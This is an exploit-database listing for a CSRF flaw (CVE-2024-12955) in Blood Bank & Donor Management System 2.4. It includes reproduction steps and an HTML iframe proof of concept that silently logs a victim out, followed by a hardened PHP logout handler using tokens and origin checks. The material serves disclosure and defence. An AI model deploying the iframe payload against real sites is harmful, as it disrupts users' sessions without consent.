Exploit Details
Basic Information
| Exploit Title | Blood Bank and Donor Management System 2.4 Cross Site Request Forgery |
|---|---|
| Exploit ID | PACKETSTORM:190568 |
| Type | packetstorm |
| Published | 2025-04-18T00:00:00 |
| Modified | 2025-04-18T00:00:00 |
CVSS Information
| CVSS Score | 6.9 |
|---|---|
| Severity | MEDIUM |
| Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/SC:N/VI:L/SI:N/VA:N/SA:N |
CVE Information
- CVE-2024-12955
Exploit Description
Blood Bank and Donor Management System version…
Exploit Code
# Exploit Title: Blood Bank & Donor Management System 2.4 – CSRF Improper Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955
## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability: state-changing requests such as logout carry no
anti-CSRF token, and logout.php acts on a plain GET. An attacker can embed the
logout URL in an iframe on a page they control; when a logged-in victim loads
that page, the browser issues the request with the victim's session cookie and
the victim is logged out without their consent. The impact is limited to
forced session termination, which matches the low integrity impact (VI:L)
recorded in the CVSS 4.0 vector.
## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:
```html
<iframe
  src="http://localhost/bbdms/logout.php"
  style="border:0px #FFFFFF none;"
  name="myLogoutFrame"
  scrolling="no"
  frameborder="1"
  marginheight="0px"
  marginwidth="0px"
  height="400px"
  width="600px"
  allowfullscreen>
</iframe>
```
4. Save the above HTML code as logout_poc.html.
5. Open the file in the browser that holds the logged-in session. The iframe
requests logout.php as soon as the page loads, so no click is required with
this markup, and the victim's session is terminated without their consent.
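A logout handler hardened against this CSRF, added here as an example. It is not the project's own code: the helper names, the choice to keep the helpers in the same file rather than a shared include, and the redirect target are assumptions.

```php
<?php
// Added example, not code from the Blood Bank & Donor Management System:
// a logout.php hardened against the CSRF described above. Assumed: the
// original handler destroyed the session on any GET. In a real deployment
// csrf_token() and logout_form_html() would live in a shared include that
// the page rendering the logout control loads; they are inline here so the
// example is self-contained.
declare(strict_types=1);

// Defense in depth (PHP 7.3+ array form): a SameSite=Lax session cookie is
// not attached to a cross-site iframe load like the one in the PoC.
// Must be called before session_start().
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Per-session anti-CSRF token, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Markup for the logout control: a POST form carrying the token.
function logout_form_html(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="logout.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<button type="submit">Logout</button></form>';
}

// True only for a same-origin POST whose token matches the session copy.
function csrf_request_is_valid(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;                       // the PoC's iframe GET fails here
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;                       // missing or wrong token
    }
    // Browsers send Origin on cross-site POSTs; when present it must name us.
    if (isset($server['HTTP_ORIGIN'])) {
        $host = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $port = parse_url($server['HTTP_ORIGIN'], PHP_URL_PORT);
        $originHost = (is_string($host) && $host !== '')
            ? $host . ($port ? ':' . $port : '')
            : '';
        if ($originHost === '' || $originHost !== ($server['HTTP_HOST'] ?? '')) {
            return false;                   // cross-site or "null" origin
        }
    }
    // Sec-Fetch-Site, when the browser sends it, must not report cross-site.
    $site = $server['HTTP_SEC_FETCH_SITE'] ?? 'same-origin';
    if ($site !== 'same-origin' && $site !== 'none') {
        return false;
    }
    return true;
}

if (!csrf_request_is_valid($_SERVER, $_POST, $_SESSION)) {
    http_response_code(403);
    exit('Logout must be submitted from the application.');
}

// Genuine logout: clear session data, expire the cookie, destroy the session.
$_SESSION = [];
if (ini_get('session.use_cookies')) {
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000,
        $p['path'], $p['domain'], $p['secure'], $p['httponly']);
}
session_destroy();
header('Location: index.php');   // assumed landing page
exit;
```

The token check is the control that closes the reported issue: the PoC's cross-site GET fails the method test, and a forged POST fails hash_equals because the attacker cannot read the token out of the victim's session. The SameSite cookie flag is a second layer rather than the fix; browsers that already default cookies to Lax would not attach the session cookie to the PoC's iframe load, but a token-less logout.php remains exploitable from any browser that does.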